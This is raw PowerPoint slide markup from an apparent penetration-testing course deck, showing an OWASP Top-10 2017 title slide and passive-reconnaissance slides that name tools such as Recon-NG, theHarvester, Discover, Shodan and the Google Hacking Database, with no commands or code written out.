            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7459061" y="2141565"/>
            <a:ext cx="4751727" cy="1838631"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C1BFC81-5940-47CC-BDFA-7D56B2BA94F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7477851" y="3980196"/>
            <a:ext cx="4714149" cy="2738287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A64B82E2-8758-44B5-83DA-F8A37B72071E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773089" y="4975626"/>
            <a:ext cx="4704762" cy="1742857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="713986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7" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="35814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b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="228601"/>
            <a:ext cx="7772400" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:br>
              <a:rPr lang="en-GB" sz="6600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" sz="6600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="6600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>OWASP Top-10 2017</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FC71C14-89D2-43F9-8800-05A04C55EC63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4880304" y="4681619"/>
            <a:ext cx="6895238" cy="1304762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3029590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Tool – Nslookup, Dig</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2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nslookup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD5AC350-C822-45A6-B0DF-36EC9131D6D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895222" y="1772988"/>
            <a:ext cx="4819048" cy="1904762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DDDD006-FAF6-42D1-87EF-B31B46390386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895222" y="4081769"/>
            <a:ext cx="4819048" cy="2513245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2558530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Tool – Recon-NG</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1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recon-NG – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Kali-tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F63A39-A279-4031-92CC-53A3CC97EBE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5415117" y="2067233"/>
            <a:ext cx="4790767" cy="4790767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24069892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 – Passive Recon</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1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discover – Passive Recon ** MOST IMPORTANT**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS Recon- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Kali-tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E1A504E-9247-4DCC-8A13-0B266F52C67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="949839" y="3342967"/>
            <a:ext cx="10022870" cy="2047916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2166301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Tool - Discover</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2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discover Script, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Leebaird</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Github</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4BB9A67-B5CB-407B-96E4-ACE78CA89DE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6475926" y="1600201"/>
            <a:ext cx="4942857" cy="5095238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2750311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Tool - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – included in Discover – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Kali-tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC95758-B1F0-4D65-867C-51E4285066EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2467896" y="2808293"/>
            <a:ext cx="5860027" cy="3950842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2438454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79D70-F228-4B54-8017-71BB79C16248}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methodology – Passive Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5E72769-5EDC-4511-8F0D-525108EEE7C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Archive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20B40056-1C97-449B-99FF-1195658F8E9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="147483" y="2703297"/>
            <a:ext cx="11841317" cy="2390566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2516574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Tool - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Exif</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Exif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strings – Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Megagoofil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Github</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D1A02CF-81D0-45B9-BEA5-BE8E7C4D5E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6667386" y="1600201"/>
            <a:ext cx="5243871" cy="733333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71031F8B-9F7B-4BF4-8130-FF62AFDF82D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6667385" y="2333534"/>
            <a:ext cx="5243871" cy="4535670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{918BC4B6-0D81-437B-A63A-DB8C4D2633B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976284" y="3390952"/>
            <a:ext cx="4691100" cy="3437820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="463122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 – Passive Recon</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1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discover – Passive Recon ** MOST IMPORTANT**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Google Hacking DB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F447CFC0-FEE6-4BA5-A9E5-7FB26CEC5B91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827001" y="2877793"/>
            <a:ext cx="6085714" cy="2695238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22274875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41CF-C6E7-4D44-ABD7-38DBC689742A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methodology – Passive Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F492162-AC7C-404F-9A7E-1B5DE1FEE2AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AE7F293-8DCA-4B7D-B02C-F12FAD720577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511277" y="2658640"/>
            <a:ext cx="10805652" cy="2963100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2247337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741CF-C6E7-4D44-ABD7-38DBC689742A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
